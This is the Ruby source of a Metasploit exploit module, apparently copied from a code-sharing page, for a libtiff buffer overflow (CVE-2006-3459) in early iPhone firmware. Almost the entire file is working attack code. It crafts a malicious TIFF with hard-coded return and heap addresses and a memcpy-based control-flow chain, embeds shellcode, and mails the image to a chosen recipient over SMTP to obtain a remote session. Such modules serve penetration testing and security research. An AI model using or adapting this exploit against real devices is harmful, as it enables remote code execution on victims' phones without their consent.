Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  #
10
  # This module sends email messages via smtp
11
  #
12
  include Msf::Exploit::Remote::SMTPDeliver
13

14
  def initialize(info = {})
15
    super(update_info(info,
16
      'Name'           => 'Apple iOS MobileMail LibTIFF Buffer Overflow',
17
      'Description'    => %q{
18
          This module exploits a buffer overflow in the version of
19
        libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
20
        1.1.1 of the Apple iPhone. iPhones which have not had the BSD
21
        tools installed will need to use a special payload.
22
      },
23
      'License'        => MSF_LICENSE,
24
      'Author'         =>  ['hdm', 'kf'],
25
      'References'     =>
26
        [
27
          ['CVE', '2006-3459'],
28
          ['OSVDB', '27723'],
29
          ['BID', '19283']
30
        ],
31
      'Stance'         => Msf::Exploit::Stance::Passive,
32
      'Payload'        =>
33
        {
34
          'Space'    => 1800,
35
          'BadChars' => "",
36
          'Compat'   =>
37
            {
38
              'ConnectionType' => '-bind -find',
39
            },
40
        },
41
      'Arch'           => ARCH_ARMLE,
42
      'Platform'       => %w{ osx },
43
      'Targets'        =>
44
        [
45

46
          [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
47
            {
48
              'Platform' => 'osx',
49

50
              # Scratch space for our shellcode and stack
51
              'Heap'     => 0x00802000,
52

53
              # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
54
              'Magic'    => 0x300d562c,
55
            }
56
          ],
57
        ],
58
      'DefaultTarget'  => 0,
59
      'DisclosureDate' => '2006-08-01'
60
      ))
61

62
  end
63

64
  def autofilter
65
    false
66
  end
67

68
  def exploit
69

70
    exts = ['jpg', 'tiff', 'tif']
71

72
    gext =  exts[rand(exts.length)]
73
    name = rand_text_alpha(rand(10)+1) + ".#{gext}"
74
    data = Rex::Text.rand_text_alpha(rand(32)+1)
75
    tiff = generate_tiff(target)
76

77
    msg = Rex::MIME::Message.new
78
    msg.mime_defaults
79
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
80
    msg.to = datastore['MAILTO']
81
    msg.from = datastore['MAILFROM']
82

83
    msg.add_part(Rex::Text.encode_base64(data, "\r\n"), "text/plain", "base64", "inline")
84
    msg.add_part_attachment(tiff, rand_text_alpha(rand(32)+1) + "." + gext)
85

86
    send_message(msg.to_s)
87

88
    print_status("Waiting for a payload session (backgrounding)...")
89
  end
90

91
  def generate_tiff(targ)
92
    #
93
    # This is a TIFF file, we have a huge range of evasion
94
    # capabilities, but for now, we don't use them.
95
    #  - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
96
    #
97

98
    lolz = 2048
99
    tiff =
100
      "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
101
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
102
      "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
103
      "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
104
      "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
105
      "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
106
      "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
107
      "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
108
      "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
109
      "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
110
      [lolz].pack("V") +
111
      "\x84\x00\x00\x00\x00\x00\x00\x00"
112

113
    # Randomize the bajeezus out of our data
114
    hehe = rand_text(lolz)
115

116
    # Were going to candy mountain!
117
    hehe[120, 4] = [targ['Magic']].pack("V")
118

119
    # >> add r0, r4, #0x30
120
    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
121

122
    # Candy mountain, Charlie!
123
    # >> mov r1, sp
124

125
    # It will be an adventure!
126
    # >> mov r2, r8
127
    hehe[ 92, 4] = [ hehe.length ].pack("V")
128

129
    # Its a magic leoplurodon!
130
    # It has spoken!
131
    # It has shown us the way!
132
    # >> bl _memcpy
133

134
    # Its just over this bridge, Charlie!
135
    # This magical bridge!
136
    # >> ldr r3, [r4, #32]
137
    # >> ldrt r3, [pc], r3, lsr #30
138
    # >> str r3, [r4, #32]
139
    # >> ldr r3, [r4, #36]
140
    # >> ldrt r3, [pc], r3, lsr #30
141
    # >> str r3, [r4, #36]
142
    # >> ldr r3, [r4, #40]
143
    # >> ldrt r3, [pc], r3, lsr #30
144
    # >> str r3, [r4, #40]
145
    # >> ldr r3, [r4, #44]
146
    # >> ldrt r3, [pc], r3, lsr #30
147
    # >> str r3, [r4, #44]
148

149
    # We made it to candy mountain!
150
    # Go inside Charlie!
151
    # sub sp, r7, #0x14
152
    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
153

154
    # Goodbye Charlie!
155
    # ;; targ['Heap'] + 0x48 becomes the stack pointer
156
    # >> ldmia sp!, {r8, r10}
157

158
    # Hey, what the...!
159
    # >> ldmia sp!, {r4, r5, r6, r7, pc}
160

161
    # Return back to the copied heap data
162
    hehe[192, 4] = [  targ['Heap'] + 196  ].pack("V")
163

164
    # Insert our actual shellcode at heap location + 196
165
    hehe[196, payload.encoded.length] = payload.encoded
166

167
    tiff << hehe
168
  end
169
end
170

171